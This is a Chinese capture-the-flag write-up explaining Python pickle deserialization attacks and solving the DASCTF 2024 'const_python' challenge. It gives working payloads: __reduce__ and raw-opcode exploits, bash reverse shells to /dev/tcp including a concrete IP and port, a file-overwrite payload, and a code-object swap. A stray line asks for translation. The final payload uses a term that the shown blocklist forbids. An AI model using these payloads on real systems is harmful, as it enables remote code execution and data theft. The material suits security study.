DASCTF2024最后一战|寒夜破晓,冬至终章 const_python 题解及相关知识详解

Pickle反序列化

一、Pickle反序列化简述

1.1 什么是 Pickle

pickle 是 Python 标准库中的一个模块,用于将 Python 对象序列化为字节流(Serialization),以及将字节流反序列化为 Python 对象(Deserialization)。

  • 序列化 (Dump):将对象转换为字节流,便于存储或网络传输。
  • 反序列化 (Load):将字节流还原为原始对象。

核心风险pickle 在反序列化时,并不是简单地重建数据,而是通过执行一系列操作码(Opcodes)来重建对象。如果攻击者能够控制输入的字节流,就可以构造恶意的操作码,让 Python 在反序列化过程中执行任意系统命令。

下面是正常的序列化/反序列化过程

1
2
3
4
5
6
7
8
9
10
11
12
import pickle

# 定义一个普通对象
data = {"user": "admin", "role": "guest"}

# 序列化 (Dump)
serialized_data = pickle.dumps(data)
print(f"序列化后的字节流: {serialized_data}")

# 反序列化 (Load) - 正常情况
deserialized_data = pickle.loads(serialized_data)
print(f"反序列化结果: {deserialized_data}")

1.2 pickle反序列化漏洞利用原理

pickle 序列化一个对象时,如果该对象定义了 __reduce__ 方法,pickle 会使用该方法返回的元组来决定如何重建对象。

__reduce__ 返回的元组格式通常为:(callable, args)

  • callable: 要调用的函数(例如 os.system)。
  • args: 传递给函数的参数元组(例如 ('whoami',))。

因此我们可以利用 __reduce__ 魔术方法来构造恶意对象,比如下面的示例,可以使得pickle在反序列化的时候执行指令whoami

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import pickle
import os

class Exploit:
def __reduce__(self):
# 返回一个元组:(要执行的函数, 参数元组)
# 这里指示 pickle 执行 os.system('whoami')
return (os.system, ('whoami',))

# 生成恶意 payload,创建一个类实例
evil_object = Exploit()
# 将类实例序列化为字节码
evil_bytes = pickle.dumps(evil_object)

print("恶意 Payload (Hex):", evil_bytes.hex())
print("恶意 Payload (Raw):", evil_bytes)

print("\n正在执行反序列化...")

pickle.loads(evil_bytes)

上面就是正常的pickle反序列化的脚本构造方法

1.3 pickle反序列化字节码学习

下面是一些常见的字节码,什么是字节码,其实就是pickle序列化出的字符串就是各种字节码的组合,可以将上面函数里的reduce内的一些操作变成字节码,类似于一种汇编代码

opcode 描述 具体写法 栈上的变化 memo上的变化
c 获取一个全局对象或import一个模块(注:会调用import语句,能够引入新的包) c[module]\n[instance]\n 获得的对象入栈
o 寻找栈中的上一个MARK,以之间的第一个数据(必须为函数)为callable,第二个到第n个数据为参数,执行该函数(或实例化一个对象) o 这个过程中涉及到的数据都出栈,函数的返回值(或生成的对象)入栈
i 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象) i[module]\n[callable]\n 这个过程中涉及到的数据都出栈,函数返回值(或生成的对象)入栈
N 实例化一个None N 获得的对象入栈
S 实例化一个字符串对象 S’xxx’\n(也可以使用双引号、'等python字符串形式) 获得的对象入栈
V 实例化一个UNICODE字符串对象 Vxxx\n 获得的对象入栈
I 实例化一个int对象 Ixxx\n 获得的对象入栈
F 实例化一个float对象 Fx.x\n 获得的对象入栈
R 选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数 R 函数和参数出栈,函数的返回值入栈
. 程序结束,栈顶的一个元素作为pickle.loads()的返回值 .
( 向栈中压入一个MARK标记 ( MARK标记入栈
t 寻找栈中的上一个MARK,并组合之间的数据为元组 t MARK标记以及被组合的数据出栈,获得的对象入栈
) 向栈中直接压入一个空元组 ) 空元组入栈
l 寻找栈中的上一个MARK,并组合之间的数据为列表 l MARK标记以及被组合的数据出栈,获得的对象入栈
] 向栈中直接压入一个空列表 ] 空列表入栈
d 寻找栈中的上一个MARK,并组合之间的数据为字典(数据必须有偶数个,即呈key-value对) d MARK标记以及被组合的数据出栈,获得的对象入栈
} 向栈中直接压入一个空字典 } 空字典入栈
p 将栈顶对象储存至memo_n pn\n 对象被储存
g 将memo_n的对象压栈 gn\n 对象被压栈
0 丢弃栈顶对象 0 栈顶对象被丢弃
b 使用栈中的第一个元素(储存多个属性名: 属性值的字典)对第二个元素(对象实例)进行属性设置 b 栈上第一个元素出栈
s 将栈的第一个和第二个对象作为key-value对,添加或更新到栈的第三个对象(必须为列表或字典,列表以数字作为key)中 s 第一、二个元素出栈,第三个元素(列表或字典)添加新值或被更新
u 寻找栈中的上一个MARK,组合之间的数据(数据必须有偶数个,即呈key-value对)并全部添加或更新到该MARK之前的一个元素(必须为字典)中 u MARK标记以及被组合的数据出栈,字典被更新
a 将栈的第一个元素append到第二个元素(列表)中 a 栈顶元素出栈,第二个元素(列表)被更新

最终的效果如下,也就是一种高级构造方法,但是也很难学习,类似于让人手写汇编,对于一些难度较大的题目来说,还是直接构造opcode更好:

1
2
3
4
5
6
7
8
9
10
11
12
13
opcode = b'''csubprocess
run
p0
((lp1
Vbash
p2
aV-c
p3
aVbash -i >& /dev/tcp/ip/port 0>&1
p4
atp5
Rp6.
'''

1.4 Pker学习

简介

  • pker是由@eddieivan01编写的以仿照Python的形式产生pickle opcode的解析器,可以在https://github.com/eddieivan01/pker下载源码。
  • 使用pker,我们可以更方便地编写pickle opcode(生成pickle版本0的opcode)。
  • 再次建议,在能够手写opcode的情况下使用pker进行辅助编写,不要过分依赖pker。

下面以一个例子来进行介绍:

1
2
3
4
5
6
7
8
9
getattr = GLOBAL('builtins', 'getattr')  # 从内置函数中获取 getattr 这个内置函数 类似import builtins,然后获取到其中的getattr这个函数
open = GLOBAL('builtins', 'open') # 同样,我们获取到 open 这个内置函数
f = open('/flag') # 利用获取到的open函数拿到 flag 的文件对象
read = getattr(f, 'read') # 注意,这个地方的 read 是独属于 f 文件对象的 read,相当于 read = f.read
content = read() # 获取到 flag 的内容
src = open('./app.py', 'w') # 获取到源代码的文件对象,这是我们唯一一个我们能拿到回显的地方了
write = getattr(src, 'write') # 拿到源代码的 write 函数
write(content) # 写入
return # 返回

然后将上面的内容保存为文件,输入到pker中,类似如下:

1
python pker.py < 1.txt

即可将对应picker序列化的字节码输出,是一种很方便的构造pickle反序列化字节码的方式,值得学习一下。

当然实际用法还有很多,这里就不过多讲解了,下面以一道题目为例

二、 DASCTF 2024 web const_python

2.1 题目介绍和思路

这是一道python pickle反序列化题目,查看题目描述显示/src下有源码,打开即可获得源码,并且告诉了flag的位置

image-20260316205527031

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92

import builtins
import io
import sys
import uuid
from flask import Flask, request,jsonify,session
import pickle
import base64


app = Flask(__name__)

app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "")


class User:
def __init__(self, username, password, auth='ctfer'):
self.username = username
self.password = password
self.auth = auth

password = str(uuid.uuid4()).replace("-", "")
Admin = User('admin', password,"admin")

@app.route('/')
def index():
return "Welcome to my application"


@app.route('/login', methods=['GET', 'POST'])
def post_login():
if request.method == 'POST':

username = request.form['username']
password = request.form['password']


if username == 'admin' :
if password == admin.password:
session['username'] = "admin"
return "Welcome Admin"
else:
return "Invalid Credentials"
else:
session['username'] = username


return '''
<form method="post">
<!-- /src may help you>
Username: <input type="text" name="username"><br>
Password: <input type="password" name="password"><br>
<input type="submit" value="Login">
</form>
'''


@app.route('/ppicklee', methods=['POST'])
def ppicklee():
data = request.form['data']

sys.modules['os'] = "not allowed"
sys.modules['sys'] = "not allowed"
try:

pickle_data = base64.b64decode(data)
for i in {"os", "system", "eval", 'setstate', "globals", 'exec', '__builtins__', 'template', 'render', '\\',
'compile', 'requests', 'exit', 'pickle',"class","mro","flask","sys","base","init","config","session"}:
if i.encode() in pickle_data:
return i+" waf !!!!!!!"

pickle.loads(pickle_data)
return "success pickle"
except Exception as e:
return "fail pickle"


@app.route('/admin', methods=['POST'])
def admin():
username = session['username']
if username != "admin":
return jsonify({"message": 'You are not admin!'})
return "Welcome Admin"


@app.route('/src')
def src():
return open("app.py", "r",encoding="utf-8").read()

if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5000)

简单代码审计一下,发现其他的接口都没啥用,可以看到这个是一个很经典的pickle反序列化,里面给了一个pickle反序列化的接口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
@app.route('/ppicklee', methods=['POST'])
def ppicklee():
data = request.form['data']

sys.modules['os'] = "not allowed"
sys.modules['sys'] = "not allowed"
try:

pickle_data = base64.b64decode(data)
for i in {"os", "system", "eval", 'setstate', "globals", 'exec', '__builtins__', 'template', 'render', '\\',
'compile', 'requests', 'exit', 'pickle',"class","mro","flask","sys","base","init","config","session"}:
if i.encode() in pickle_data:
return i+" waf !!!!!!!"

pickle.loads(pickle_data)
return "success pickle"
except Exception as e:
return "fail pickle"

简单理一下逻辑就是从post读取data数据,然后base64解码后反序列化,同时禁用了一些字段,反正就是想办法绕过这些黑名单,实现反序列化rce。

2.2 四种解题方式

2.2.1 最简单也是最好想的 覆盖文件

因为从上面的代码中可以看到里面没有限制open和write指令,且/src还读取了app.py这个文件的内容。则我们只需要想办法把app.py里面的内容变成flag即可解出此题。并且限制的是__builtins__,不是builtins,如果限制了builtins那也就代表用不了其中的任何函数,因此后续我们利用builtins中的open和write来将flag的内容写入app.py。构造出pker对应的输入脚本,然后就是写入文件,执行pker,直接获取到对应的反序列化字节码

image-20260316221649003

image-20260316221611431

将字节码base64加密后的字符串post到题目中即可

image-20260316221747290

image-20260316221529070

之后直接打开/src发现相应的源码已被覆盖为flag

image-20260316221622126

2.2.2 RCE反弹shell,利用reduce方式

利用上面学到的最纯正的pickle反序列化脚本的构造方式,可以构造出下面的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
import os
import subprocess
import pickle
import base64

class A():
def __reduce__(self):
#这里命令不能直接用bash -i >& /dev/tcp/$ip/$port 0>&1
return (subprocess.run, (["bash", "-c", "bash -i >& /dev/tcp/117.143.183.109/7777 0>&1"],))

a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

image-20260316231157174

之后直接拿去post,即可反弹shell,这里我的nc显示收到反弹shell但是链路建立不起来,估计是mac防火墙的问题,这里就不细究了。

image-20260316231024611

2.2.3 利用Pker

这里其实也就是将上面reduce的方法转换成pker的方式,毕竟用pker来构造还是比自己构造简单的,最后的输入脚本如下:

1
2
3
4
run = GLOBAL('subprocess', 'run')
cmd_list = ["bash", "-c", "bash -i >& /dev/tcp/117.143.183.109/7777 0>&1"]
run(cmd_list)
return

image-20260316231616330

最后拿去base64加密输入到题目中也可以实现RCE。

请将下面的内容转化为英文格式,方便外国人进行阅读

2.2.4 官方题解

这个官方题解很有意思,是一个很新的思路,值得学习。感觉官方题解属于进阶的pickle利用方式,也把难度提上去了,看样子上面的解法属于非预期了,官方题解也能和题目名称const_python呼应上。

核心原理

在 Python 中,函数不仅仅是代码文本,它在内存中是一个对象,其编译后的字节码存储在 __code__ 属性中(类型为 types.CodeType)。

CodeType 包含了很多属性,其中最重要的是 co_consts(常量元组)。
当你写这样一行代码时:

1
2
def src():
return open("app.py", "r", encoding="utf-8").read()

Python 编译器会把字符串 "app.py", "r", "utf-8" 等作为常量存储在 co_consts 元组中。字节码指令(如 LOAD_CONST)会通过索引去这个元组里取值。

攻击点:
如果我们能在服务器运行时,动态地替换掉 src 函数的 __code__.co_consts,把 "app.py" 换成 "/flag",那么当再次调用 src() 时,它实际上执行的指令就是 open("/flag", ...)

方便理解,下面我写了一个demo来正常实现上面的操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import builtins
import types

def src():
return open("app.py", "r",encoding="utf-8").read()


oCode = src.__code__.co_consts
print("src函数的常量字节码为:",oCode)

for i in src.__code__.__dir__():
print(f"{i} : {getattr(src.__code__, i)}")

g1 = builtins.getattr
g2 = getattr(src,"__code__")
g3 = getattr(g2,"co_argcount")
g4 = getattr(g2,"co_posonlyargcount")
g5 = getattr(g2,"co_kwonlyargcount")
g6 = getattr(g2,"co_nlocals")
g7 = getattr(g2,"co_stacksize")
g8 = getattr(g2,"co_flags")
g9 = getattr(g2,"co_code")
g10 = (None, '1.txt', 'r', 'utf-8', ('encoding',))#g10 = getattr(g2,"co_consts")
g11 = getattr(g2,"co_names")
g12 = getattr(g2,"co_varnames")
g13 = getattr(g2,"co_filename")
g14 = getattr(g2,"co_name")
g15 = getattr(g2,"co_qualname")
g16 = getattr(g2,"co_firstlineno")
g17 = getattr(g2,"co_linetable")
g18 = getattr(g2,"co_exceptiontable")



g19 = types.CodeType(g3,g4,g5,g6,g7,g8,g9,g10,g11,g12,g13,g14,g15,g16,g17,g18)
# g20 = builtins.setattr
setattr(src,"__code__",g19)

oCode = src.__code__.co_consts
print("src函数的常量字节码为:",oCode)
# src()

flag = src()
print(flag)

最后输出结果即为把1.txt内的内容打印出来。

因此我们只需要把上面的过程转换成pker的输入格式即可,最后构造payload如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# 1. 获取基础工具函数
# 获取 builtins.getattr (用于取属性)
getattr_func = GLOBAL('builtins', 'getattr')
# 获取 builtins.setattr (用于改属性)
setattr_func = GLOBAL('builtins', 'setattr')
# 获取 types.CodeType (用于构造新代码对象)
CodeType_cls = GLOBAL('types', 'CodeType')

# 2. 定位目标函数 src 及其代码对象
# src 在全局作用域 (globals()['src'])
# pker 中获取全局变量通常需要用 getattr(globals(), 'name') 或者如果 pker 支持直接引用全局名
# 这里使用最稳妥的方式:先拿 globals 字典,再拿 src
globals_dict = GLOBAL('builtins', 'globals')()
src_func = getattr_func(globals_dict, 'src')
src_code = getattr_func(src_func, '__code__')

# 3. 提取原代码对象的所有属性 (除了 co_consts)
argcount = getattr_func(src_code, 'co_argcount')
posonlyargcount = getattr_func(src_code, 'co_posonlyargcount')
kwonlyargcount = getattr_func(src_code, 'co_kwonlyargcount')
nlocals = getattr_func(src_code, 'co_nlocals')
stacksize = getattr_func(src_code, 'co_stacksize')
flags = getattr_func(src_code, 'co_flags')
code_bytes = getattr_func(src_code, 'co_code')
names = getattr_func(src_code, 'co_names')
varnames = getattr_func(src_code, 'co_varnames')
filename = getattr_func(src_code, 'co_filename')
name = getattr_func(src_code, 'co_name')
firstlineno = getattr_func(src_code, 'co_firstlineno')
lnotab = getattr_func(src_code, 'co_lnotab')
freevars = getattr_func(src_code, 'co_freevars')
cellvars = getattr_func(src_code, 'co_cellvars')

# 4. 构造新的 co_consts 元组
# 原版是: (None, 'app.py', 'r', 'utf-8', ('encoding',))
# 新版改为: (None, '/flag', 'r', 'utf-8', ('encoding',))
new_consts = (None, '/flag', 'r', 'utf-8', ('encoding',))

# 5. 实例化新的 CodeType 对象
# 参数顺序必须严格对应 types.CodeType 的定义
new_code_obj = CodeType_cls(
argcount,
posonlyargcount,
kwonlyargcount,
nlocals,
stacksize,
flags,
code_bytes,
new_consts,
names,
varnames,
filename,
name,
firstlineno,
lnotab,
freevars,
cellvars
)
# 6. 执行偷梁换柱:src.__code__ = new_code_obj
setattr_func(src_func, '__code__', new_code_obj)
return

然后放到pker里面运行,输出字节码,转换成base64后post到网站,然后打开/src,可以发现app.py成功被换为了flag